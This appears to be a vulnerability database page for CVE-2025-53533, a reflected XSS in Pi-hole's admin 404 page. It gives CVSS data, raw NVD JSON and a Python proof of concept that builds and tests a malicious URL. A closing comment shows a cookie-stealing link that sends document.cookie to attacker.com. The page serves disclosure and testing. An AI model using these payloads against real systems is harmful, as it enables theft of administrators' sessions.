Security Vulnerability Report
CVE-2025-53533 CVSS 6.1 MEDIUM

CVE-2025-53533

Published: 2025-10-27 19:16:04
Last Modified: 2025-12-18 16:23:06

Description

Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level advertisement and internet tracker blocking application. Pi-hole Admin Interface versions 6.2.1 and earlier are vulnerable to reflected cross-site scripting (XSS) via a malformed URL path. The 404 error page includes the requested path in the class attribute of the body tag without proper sanitization or escaping. An attacker can craft a URL containing an onload attribute that will execute arbitrary JavaScript code in the browser when a victim visits the malicious link. If an attacker sends a crafted pi-hole link to a victim and the victim visits it, attacker-controlled JavaScript code is executed in the browser of the victim. This has been patched in version 6.3.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:pi-hole:web_interface:*:*:*:*:*:*:*:* - VULNERABLE
Pi-hole Admin Interface <= 6.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-53533 PoC: Reflected XSS in Pi-hole Admin Interface 404 page
# Attack vector: Malformed URL path with onload attribute injection
# Target: Pi-hole Admin Interface <= 6.2.1
#
# Step 1: Craft the malicious URL
#   The payload injects an onload attribute into the body tag class via 404 page
#   URL encode the payload to bypass potential filters
#   Example malicious URL (URL decoded for readability):
#   https://vulnerable-pihole.com/<img src=x onerror=alert(document.domain)>
#
# Step 2: Send the crafted URL to the victim
#   When victim visits the link, the following happens:
#   1. Server returns 404 page
#   2. The requested path is placed in body class attribute
#   3. Browser parses the HTML and executes the onload/onerror handler

# Python PoC script
import urllib.parse

import requests


def generate_poc(target_url):
    """Generate CVE-2025-53533 exploit URL"""
    # XSS payload - will be placed in body class attribute
    xss_payload = '<img src=x onerror=alert(document.cookie)>'
    # URL encode the payload
    encoded_payload = urllib.parse.quote(xss_payload)
    # Construct the malicious URL
    malicious_url = f"{target_url.rstrip('/')}/{encoded_payload}"
    return malicious_url


def test_vulnerability(target_url):
    """Test if the target is vulnerable"""
    poc_url = generate_poc(target_url)
    print(f"[*] Testing CVE-2025-53533 on: {target_url}")
    print(f"[*] Malicious URL: {poc_url}")
    try:
        response = requests.get(poc_url, timeout=10)
        if response.status_code == 404:
            # Check if payload is reflected in body class
            if '<img src=x onerror=alert' in response.text:
                print("[!] VULNERABLE: XSS payload reflected in 404 page")
                return True
            else:
                print("[-] Possibly patched or filtered")
                return False
        else:
            print(f"[*] Unexpected status code: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    target = "https://pi-hole-admin.example.com"
    test_vulnerability(target)

# Real-world attack scenario:
# Attacker sends this link to victim via email, chat, etc.
# https://192.168.1.1/admin/<img src=x onload=fetch('https://attacker.com/steal?c='+document.cookie)>
# Victim clicks link -> XSS executes -> Cookie stolen
```

References

https://github.com/pi-hole/web/security/advisories/GHSA-w8f8-92rx-4f6w (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53533", "sourceIdentifier": "[email protected]", "published": "2025-10-27T19:16:04.003", "lastModified": "2025-12-18T16:23:06.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level advertisement and internet tracker blocking application. Pi-hole Admin Interface versions 6.2.1 and earlier are vulnerable to reflected cross-site scripting (XSS) via a malformed URL path. The 404 error page includes the requested path in the class attribute of the body tag without proper sanitization or escaping. An attacker can craft a URL containing an onload attribute that will execute arbitrary JavaScript code in the browser when a victim visits the malicious link. If an attacker sends a crafted pi-hole link to a victim and the victim visits it, attacker-controlled JavaScript code is executed in the browser of the victim. This has been patched in version 6.3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pi-hole:web_interface:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.3", "matchCriteriaId": "D3BA34FE-9D93-4877-85D7-B0C15D1C11A9"}]}]}], "references": [{"url": "https://github.com/pi-hole/web/security/advisories/GHSA-w8f8-92rx-4f6w", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}